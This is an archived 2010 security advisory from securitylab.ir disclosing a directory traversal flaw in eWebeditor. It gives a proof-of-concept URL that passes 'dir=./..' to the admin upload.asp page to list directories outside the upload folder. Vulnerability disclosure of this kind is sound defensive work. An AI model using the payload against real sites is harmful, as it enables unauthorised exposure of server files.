Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

vBulletin nulled (validator. php) files/directories disclosure

Insufficient User Input Validation in VP-ASP 6.50 Demo Code

From:	info_(at)_securitylab.ir <info_(at)_securitylab.ir>
Date:	21.01.2010
Subject:	eWebeditor Directory Traversal Vulnerability

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: eWebeditor
# Version: all version
#################################################################
# Vulnerability Info:
# Type: Directory Traversal
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com
###################################################################